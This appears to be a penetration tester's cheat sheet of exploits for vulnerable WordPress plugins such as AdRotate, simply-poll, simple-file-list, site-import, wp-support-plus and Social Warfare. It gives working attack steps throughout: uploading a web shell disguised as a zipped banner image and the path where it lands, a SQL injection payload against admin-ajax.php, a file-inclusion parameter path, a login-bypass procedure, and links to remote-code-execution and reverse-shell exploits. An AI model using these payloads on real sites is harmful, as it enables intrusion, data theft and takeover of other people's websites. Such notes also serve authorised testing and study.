wordpress plugin exploits

adRotate 5.8.6.2

# can upload shell as zip as image banner
# banner images are auto extracted to /banner folder
# use plugin settings to find where the /banner folder is
# mostly /var/www/html/wordpress/wp-content/banners
wp-content/banners/web.php

simply-poll-master 1.4.1 | 1.5 |

• https://www.exploit-db.com/exploits/40971

# POST http://example.com/wp-admin/admin-ajax.php
# --data="action=spAjaxResults&pollid=1 UNION SELECT 1,2,3,4,5,6,7 --"
# pollid is injectable 
# UNION query : 7 columns; 6th in injectable

simple-file-list 4.2.2 | RCE

• direct reverse shell | https://www.exploit-db.com/exploits/48979

• arbitary file upload | https://www.exploit-db.com/exploits/48449

site-import 1.0.1 | LFI + RFI

• https://www.exploit-db.com/exploits/39558

/wp-content/plugins/site-import/admin/page.php?url=

wp-support-plus-responsive-ticket-system 7.1.3

• https://www.exploit-db.com/exploits/41006

# make exploit.html > update action to domain > run it > submit form
# refresh website > we are logged in

social warfare < 3.5.3

• https://github.com/hash3liZer/CVE-2019-9978 (save payload in .txt and host it locally)

• https://www.exploit-db.com/exploits/46794

• https://github.com/shad0w008/social-warfare-RCE